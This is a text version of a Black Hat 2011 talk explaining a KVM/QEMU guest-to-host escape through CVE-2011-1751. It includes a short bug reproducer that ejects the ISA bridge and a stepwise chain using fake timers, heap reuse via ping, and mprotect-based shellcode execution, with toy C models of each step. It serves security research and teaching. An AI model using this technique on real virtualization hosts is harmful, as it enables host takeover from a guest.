Virtunoid: Breaking out of KVM. Nelson Elhage, Black Hat USA 2011. Outline: Introduction, Related work, Background Knowledge, Attack Detailed, CVE-2011-1751 Bug Detailed, Exploit Detailed (Take Control of %rip), Inject Shellcode into host, Disable non executable page, Bypassing ASLR
Virtunoid: Breaking out of KVM Nelson Elhage Black Hat USA 2011
Outline • Introduction • Related work • Background Knowledge • Attack Detailed • CVE-2011-1751 Bug Detailed • Exploit Detailed (Take Control of %rip) • Inject Shellcode into host • Disable non executable page • Bypassing ASLR • Conclusions • Reference
Introduction • It was found that the PIIX4 Power Management emulation layer in qemu-kvm did not properly check for hot plug eligibility during device removals. A privileged guest user could use this flaw to crash the guest or, possibly, execute arbitrary code on the host. (CVE-2011-1751)
QEMU-KVM Background Knowledge • A generic and open source machine emulator and virtualizer. • Three components: • kvm.ko • kvm-intel.ko or kvm-amd.ko • qemu-kvm
kvm.ko [3] • The core KVM kernel module • Provides ioctls for communicating with the kernel module • Primarily responsible for emulating the virtual CPU and MMU • Emulates a few devices in-kernel for efficiency • Contains an emulator for a subset of x86 used in handling certain traps
Kvm-intel.ko/kvm-amd.ko • Provides support for Intel’s VMX and AMD’s SVM virtualization extensions • Relatively small compared to the rest of KVM
Qemu-kvm • Provides the most direct user interface to KVM • Based on the classic x86 emulator • Implements the bulk of the virtual devices a VM uses • Implements a wide variety of possible devices and buses • An order of magnitude more code than the kernel module
QEMUTimer (qemu_src/qemu_common.h)
• static QEMUTimer *active_timers[QEMU_NUM_CLOCKS];
• struct QEMUTimer {
      QEMUClock *clock;
      int64_t expire_time;
      QEMUTimerCB *cb;          /* callback function */
      void *opaque;             /* callback parameter */
      struct QEMUTimer *next;   /* linked list */
  };
[Figure: active_timers pointing to a linked list of QEMUTimer structures]
QEMUTimer (qemu_src/vl.c) • Related functions: • qemu_new_timer: allocates memory for a new timer. • qemu_mod_timer: sets the timer's expire time and adds it to the linked list. • qemu_run_timers: walks the linked list and calls each expired timer's callback function with opaque as the parameter.
QEMUTimer(qemu_src/vl.c) • The main_loop_wait function will iterate through the active_timers and call qemu_run_timers()
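The timer mechanics above can be sketched as a small self-contained model. This is a simplified illustration, not QEMU's code: it assumes a single clock, and every name prefixed with model_ (plus ModelTimer, count_cb and timer_demo) is hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

typedef void ModelTimerCB(void *opaque);

typedef struct ModelTimer {
    int64_t expire_time;
    ModelTimerCB *cb;          /* callback function */
    void *opaque;              /* callback parameter */
    struct ModelTimer *next;   /* linked list */
} ModelTimer;

/* Single list for brevity; the slides show one list per clock. */
static ModelTimer *model_active_timers;

/* Counterpart of qemu_new_timer: allocate and fill in a timer. */
static ModelTimer *model_new_timer(ModelTimerCB *cb, void *opaque)
{
    ModelTimer *t = calloc(1, sizeof(*t));
    if (t) {
        t->cb = cb;
        t->opaque = opaque;
    }
    return t;
}

/* Counterpart of qemu_mod_timer: unlink if queued, then insert sorted. */
static void model_mod_timer(ModelTimer *t, int64_t expire_time)
{
    ModelTimer **pt;

    for (pt = &model_active_timers; *pt; pt = &(*pt)->next) {
        if (*pt == t) {
            *pt = t->next;
            break;
        }
    }
    for (pt = &model_active_timers;
         *pt && (*pt)->expire_time <= expire_time;
         pt = &(*pt)->next) {
    }
    t->expire_time = expire_time;
    t->next = *pt;
    *pt = t;
}

/* Counterpart of qemu_run_timers: fire every timer that has expired. */
static void model_run_timers(int64_t now)
{
    while (model_active_timers && model_active_timers->expire_time <= now) {
        ModelTimer *t = model_active_timers;
        model_active_timers = t->next;
        t->next = NULL;
        t->cb(t->opaque);
    }
}

static void count_cb(void *opaque) { ++*(int *)opaque; }

/* Queue three timers and run the list once; returns how many fired. */
static int timer_demo(void)
{
    int hits = 0;
    ModelTimer *a = model_new_timer(count_cb, &hits);
    ModelTimer *b = model_new_timer(count_cb, &hits);
    ModelTimer *c = model_new_timer(count_cb, &hits);

    if (!a || !b || !c) {
        free(a); free(b); free(c);
        return -1;
    }
    model_mod_timer(a, 20);
    model_mod_timer(b, 10);
    model_mod_timer(c, 30);
    model_run_timers(25);        /* b and a fire; c stays queued */
    model_active_timers = NULL;  /* drop c before freeing everything */
    free(a); free(b); free(c);
    return hits;
}
```

The point to notice is that the list only stores raw cb and opaque pointers. Nothing in it records who owns the memory behind opaque, which is what the bug described later relies on.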
Real Time Clock • A computer clock that keeps track of the current time • The MC146818 RTC hardware manual can be found at • http://wiki.qemu.org/File:MC146818AS.pdf
Real Time Clock Emulations [2] • RTCState structure
struct RTCState {
    …..
    QEMUTimer *second_timer;
    QEMUTimer *second_timer2;
};
Real Time Clock Emulations • Related functions: • rtc_initfn: initializes the RTC. • rtc_update_second: updates the expire time of the QEMUTimer and adds it to the linked list.
Real Time Clock Emulations • rtc_initfn:
    RTCState *s = ….
    s->second_timer = qemu_new_timer(rtc_clock, rtc_update_second, s);
    s->second_timer2 = qemu_new_timer(rtc_clock, rtc_update_second2, s);
    qemu_mod_timer(s->second_timer2, s->next_second_time);
RTCState and QEMUTimer • [Figure: the active_timers list; the RTCState's second_timer and second_timer2 each point to a QEMUTimer whose cb is rtc_update_second or rtc_update_second2 and whose opaque points back to the RTCState]
PIIX 4 • A south bridge chip. • The default south bridge chip used by qemu-kvm. • Includes ACPI, PCI-ISA, and an embedded MC146818 RTC. • Supports PCI device hotplug, driven by writing values to I/O port 0xae08. • QEMU uses qdev_free to emulate device unplugging. • Certain devices don’t support hotplug, but QEMU didn’t check this.
PCI-ISA hot plug • It should not be possible to unplug the ISA bridge • KVM’s emulated RTC is not designed to be unplugged.
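Bug Detailed • [Code screenshot; annotation: the code does not check whether the device can be unplugged]
[Code screenshot; annotations: the RTCState is being deallocated; the second timer is added to the linked list]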
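Bug reproducer
#include <sys/io.h>

int main(void)
{
    if (iopl(3) != 0)    /* raise the I/O privilege level; needs a privileged guest user */
        return 1;
    outl(2, 0xae08);     /* write to the PCI hotplug port to eject the ISA bridge */
    return 0;
}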
Unplug RTC • [Figure: the active_timers list contains the RTC's second_timer QEMUTimer; its cb is rtc_update_second and its opaque points to the RTCState]
Unplug RTC • [Figure: same list after the unplug; the RTCState is now a dummy memory region]
Return to main_loop_wait • Call qemu_run_timers • [Figure: same list and dummy memory region]
QEMUTimer callback • rtc_update_second(opaque) • [Figure: same list and dummy memory region]
Next main_loop_wait • [Figure: same list and dummy memory region]
Exploit Detailed (Take Control of %rip) • 1. Inject a controlled QEMUTimer into qemu-kvm • 2. Eject the ISA bridge • 3. Force an allocation into the freed RTCState, with second_timer pointing to our fake QEMUTimer
Inject a Fake QEMUTimer • The guest RAM is backed by an mmap()ed region inside the qemu-kvm process. • Allocate the fake timer in guest RAM and calculate its host address with the following formula: • hva = physmem_base + gpa • gpa = page_translation(gva) (see Linux kernel project 1) • gva = guest virtual address • gpa = guest physical address • hva = host virtual address • physmem_base = start of the mmap()ed region • For now, assume we know physmem_base (no ASLR)
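The address arithmetic can be sketched as follows. The slide does not say how page_translation is implemented; this sketch assumes the guest is Linux and that the translation comes from a /proc/self/pagemap entry (bit 63 = page present, bits 0-54 = page frame number). The function names, the 4 KiB page size and the sample values are illustrative assumptions.

```c
#include <assert.h>
#include <stdint.h>

#define GUEST_PAGE_SIZE   4096ULL            /* assumed 4 KiB guest pages */
#define PAGEMAP_PRESENT   (1ULL << 63)       /* pagemap: page is in RAM */
#define PAGEMAP_PFN_MASK  ((1ULL << 55) - 1) /* pagemap: bits 0-54 hold the PFN */

/*
 * Turn one pagemap entry plus the guest virtual address it describes
 * into a guest physical address. Returns -1 if the page is not present.
 */
static int pagemap_entry_to_gpa(uint64_t entry, uint64_t gva, uint64_t *gpa)
{
    if (!(entry & PAGEMAP_PRESENT))
        return -1;
    *gpa = (entry & PAGEMAP_PFN_MASK) * GUEST_PAGE_SIZE
         + (gva % GUEST_PAGE_SIZE);
    return 0;
}

/* hva = physmem_base + gpa, exactly as on the slide. */
static uint64_t gpa_to_hva(uint64_t physmem_base, uint64_t gpa)
{
    return physmem_base + gpa;
}
```

With a made-up entry whose PFN is 0x1234, a gva ending in 0xabc and a made-up physmem_base of 0x7f0000000000, the gpa is 0x1234abc and the hva is 0x7f0001234abc.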
Force allocation into the freed RTCState • Force QEMU to call malloc • Use the qemu-kvm user-mode networking stack • qemu-kvm implements a DHCP server, a DNS server and a NAT gateway in its user-mode networking stack • The user-mode stack normally handles packets synchronously • To prevent recursion, if a second packet is emitted while handling a first packet, the second packet is queued using malloc • An ICMP ping to the gateway triggers this path
Putting it together • 1. Allocate a fake QEMUTimer • 2. Calculate the fake timer's address • 3. Unplug the ISA bridge • 4. Ping the gateway with a packet containing pointers to your fake timer
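The reuse of the freed RTCState can be illustrated with a safe toy model. Nothing here touches QEMU or performs a real use-after-free: toy_alloc and toy_free are a hypothetical one-slot allocator that hands the same block back after a free, standing in for the assumption that the host's malloc reuses the freed chunk for the queued packet. All type and function names are invented for the sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

typedef void TimerCB(void *opaque);
typedef struct Timer { TimerCB *cb; void *opaque; } Timer;
typedef struct RTCModel { unsigned char regs[64]; Timer *second_timer; } RTCModel;

/* One-slot toy allocator: a freed slot is handed out again unchanged. */
static void *slot;
static int slot_in_use;

static void *toy_alloc(size_t n)
{
    if (!slot)
        slot = malloc(sizeof(RTCModel));
    if (!slot || slot_in_use || n > sizeof(RTCModel))
        return NULL;
    slot_in_use = 1;
    return slot;
}

static void toy_free(void *p) { if (p == slot) slot_in_use = 0; }

static Timer *pending;   /* timer re-armed by the stale callback */
static int marker;       /* records which callback ran last */

/* Stands in for the RTC update callback: trusts whatever opaque holds. */
static void model_update_second(void *opaque)
{
    RTCModel s;
    memcpy(&s, opaque, sizeof(s));
    pending = s.second_timer;
}

static void legit_cb(void *opaque)    { (void)opaque; marker = 1; }
static void attacker_cb(void *opaque) { (void)opaque; marker = 2; }

static int reuse_demo(void)
{
    Timer legit = { legit_cb, NULL };
    Timer fake  = { attacker_cb, NULL };   /* step 1: fake timer */
    RTCModel init = { {0}, &legit };
    RTCModel payload = { {0}, &fake };     /* "ping" body with a pointer to it */

    void *rtc = toy_alloc(sizeof(init));
    if (!rtc)
        return -1;
    memcpy(rtc, &init, sizeof(init));
    Timer stale = { model_update_second, rtc };  /* stays queued after unplug */

    toy_free(rtc);                               /* step 3: unplug */

    void *pkt = toy_alloc(sizeof(payload));      /* step 4: queued packet */
    if (pkt != rtc)
        return -1;
    memcpy(pkt, &payload, sizeof(payload));

    stale.cb(stale.opaque);        /* first loop: re-arms the fake timer */
    pending->cb(pending->opaque);  /* second loop: attacker-chosen callback */
    return marker;
}
```

In this model reuse_demo() ends with the attacker-chosen callback having run, which mirrors the two main_loop_wait passes in the slides.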
Allocate Fake QEMUTimer • [Figure: the active_timers list with the RTC's second_timer (cb = rtc_update_second, opaque = RTCState); a separate fake QEMUTimer whose cb points to the evil function (shellcode)]
Unplug ISA bridge • Ping the gateway • [Figure: the RTCState's second_timer field now points to the fake QEMUTimer]
First main_loop_wait • [Figure: rtc_update_second runs and the fake QEMUTimer is linked into the active_timers list]
Second main_loop_wait • [Figure: the fake QEMUTimer is on the active_timers list; its cb points to the evil function (shellcode)]
What’s Next • 1. We have %rip control. • 2. Where is the evil function? • Inject shellcode into host virtual memory • Host virtual memory has page protection (NX bit) • 3. Solutions: • A. ROP • B. Something clever
Multiple QEMUTimer Chaining • 1. We control the QEMUTimer data structure. • 2. Create multiple QEMUTimer objects and chain them together. • [Figure: three chained QEMUTimer structures whose cb fields point to F1, F2 and F3 and whose opaque fields hold X, Y and Z, giving the calls F1(X), F2(Y), F3(Z)]
Multiple QEMUTimer Chaining • We now have multiple one-argument function calls. • We want function calls with more arguments. For example, mprotect takes three arguments.
System V AMD64 ABI [7] • Arguments of types _Bool, char, short, int, long, long long, and pointers are in the INTEGER class. • If the class is INTEGER, the next available register of the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9 is used. • For more detail, see reference [7].
Multiple QEMUTimer Chaining • Suppose we can find a function with the following property. • Let f1(x) be set_rsi. • The %rsi register is not modified during qemu_run_timers() in most QEMU versions. • Therefore, F2(y) becomes F2(y, x), since we control %rsi through f1(x). set_rsi: movq %rdi, %rsi; ret
set_rsi for QEMUTimer Chaining • This function copies its first parameter into the second parameter of ioport_write. • %rdi holds the first parameter and %rsi holds the second. Therefore we get a function with the previous property (a move from %rdi to %rsi). void cpu_outl(pio_addr_t addr, uint32_t val) { ioport_write(2, addr, val); }
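Register state cannot be shown in portable C, so the chaining idea is sketched here with an explicit, simulated register file. This is a model of the reasoning only: Regs, ChainTimer, run_chain and the two callbacks are hypothetical, and the only assumption carried over from the slides is that the timer loop loads %rdi with opaque before each call and leaves %rsi untouched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simulated argument registers: first and second INTEGER-class arguments. */
typedef struct Regs { uint64_t rdi, rsi; } Regs;

typedef void ChainCB(Regs *r);

typedef struct ChainTimer {
    ChainCB *cb;
    uint64_t opaque;
    struct ChainTimer *next;
} ChainTimer;

/* Models set_rsi: copy the first argument into the second-argument register. */
static void model_set_rsi(Regs *r) { r->rsi = r->rdi; }

/* A stand-in two-argument target that records what it was called with. */
static uint64_t seen_rdi, seen_rsi;
static void two_arg_target(Regs *r) { seen_rdi = r->rdi; seen_rsi = r->rsi; }

/* Models the timer loop: only rdi is reloaded between callbacks. */
static void run_chain(ChainTimer *t, Regs *r)
{
    for (; t; t = t->next) {
        r->rdi = t->opaque;
        t->cb(r);
    }
}

/* F1(x) = set_rsi(0x2222), then F2(y) effectively runs as F2(0x1111, 0x2222). */
static int chain_demo(void)
{
    ChainTimer second = { two_arg_target, 0x1111, NULL };
    ChainTimer first  = { model_set_rsi,  0x2222, &second };
    Regs r = { 0, 0 };

    run_chain(&first, &r);
    return seen_rdi == 0x1111 && seen_rsi == 0x2222;
}
```

The second callback sees its own opaque as the first argument and the first timer's opaque as the second, which is the F2(y, x) effect described above.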
mprotect for QEMUTimer Chaining • mprotect prototype: • mprotect(addr, len, prot) • PROT_EXEC = 4 • Use the following function • We control the “opaque/ioport” through the QEMUTimer and control the “addr” through set_rsi() • It seems we control everything in this function
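As a reminder of how mprotect behaves on its own, here is a minimal sketch, assuming a Linux host. It only changes a freshly mapped anonymous page to read-only and shows that the address must be page-aligned; mprotect_demo is a hypothetical helper name.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map one page, change its protection, then try the same call on an
 * unaligned address. Returns 1 if the aligned call succeeds and the
 * unaligned one fails with EINVAL, 0 otherwise, -1 if mmap fails.
 */
static int mprotect_demo(void)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return -1;

    unsigned char *p = mmap(NULL, (size_t)page, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    /* int mprotect(void *addr, size_t len, int prot); */
    int aligned = mprotect(p, (size_t)page, PROT_READ);

    errno = 0;
    int unaligned = mprotect(p + 1, 1, PROT_READ);  /* addr not page-aligned */
    int unaligned_errno = errno;

    munmap(p, (size_t)page);
    return aligned == 0 && unaligned == -1 && unaligned_errno == EINVAL;
}
```

The alignment requirement is why the target address in the next slide has to sit on a page boundary.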
Putting it All Together • Allocate a fake IORangeOps with • fake_ops->read = mprotect • Allocate a page-aligned IORange with • fake_ioport->ops = fake_ops • fake_ioport->base = -PAGE_SIZE • Copy shellcode following the IORange • Construct a timer chain that calls • cpu_outl(0, *) • ioport_readl_thunk(fake_ioport, 0) • fake_ioport + 1 (the shellcode that follows the IORange)
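Why base = -PAGE_SIZE is useful can be checked with a little arithmetic. The sketch below assumes, without quoting QEMU's source, that the read thunk forwards (range, addr - base, 4, &data) to ops->read; under that assumption the three leading arguments line up with mprotect(addr, len, prot). All Model* names are hypothetical, and a recording stub takes the place of mprotect.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_PAGE_SIZE 4096u   /* assumed page size */

struct ModelRange;
typedef void ModelRead(struct ModelRange *r, uint64_t offset,
                       unsigned width, uint64_t *data);

typedef struct ModelOps { ModelRead *read; } ModelOps;
typedef struct ModelRange { const ModelOps *ops; uint64_t base; } ModelRange;

/* Recording stub in place of mprotect: remembers its first three arguments. */
static void *rec_addr;
static uint64_t rec_len;
static unsigned rec_prot;

static void record_read(ModelRange *r, uint64_t offset,
                        unsigned width, uint64_t *data)
{
    (void)data;
    rec_addr = r;       /* would be mprotect's addr */
    rec_len = offset;   /* would be mprotect's len  */
    rec_prot = width;   /* would be mprotect's prot */
}

/* Assumed shape of the 4-byte read thunk (an assumption, see lead-in). */
static uint32_t model_readl_thunk(void *opaque, uint32_t addr)
{
    ModelRange *range = opaque;
    uint64_t data = 0;

    range->ops->read(range, addr - range->base, 4, &data);
    return (uint32_t)data;
}

static int thunk_demo(void)
{
    static const ModelOps ops = { record_read };
    ModelRange range = { &ops, -(uint64_t)MODEL_PAGE_SIZE };

    model_readl_thunk(&range, 0);   /* addr = 0, as set via cpu_outl(0, *) */
    return rec_addr == (void *)&range
        && rec_len == MODEL_PAGE_SIZE   /* 0 - (-PAGE_SIZE) wraps to PAGE_SIZE */
        && rec_prot == 4;               /* 4 == PROT_EXEC on the slide */
}
```

Under these assumptions the call becomes the equivalent of mprotect(fake_ioport, PAGE_SIZE, PROT_EXEC), which covers the page holding the IORange and the shellcode copied after it.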
mprotect QEMUTimer Chain • [Figure: three chained QEMUTimers; the first two have cb = cpu_outl and cb = ioport_readl_thunk; the page-aligned IORange has ops pointing to an IORangeOps whose read field is mprotect; the rest of the page is filled with shellcode]
Address • The base address of the qemu-kvm binary, to find code addresses (such as mprotect ….) • physmem_base, the address of the physical memory mapping inside qemu-kvm • Solutions: • Find an information leak • Assume non-PIE: every major distribution compiles qemu-kvm as a non-position-independent executable. • What about physmem_base?
fw_cfg • Emulated I/O ports 0x510 (address) and 0x511 (data) • Used to communicate various tables to the QEMU BIOS (e820 map, ACPI tables, etc.) • Also provides support for exporting writable tables to the BIOS • However, fw_cfg_write doesn’t check whether the target table is supposed to be writable
Static data • Several fw_cfg areas are backed by statically-allocated buffers. • Net result: nearly 500 writable bytes inside static variables.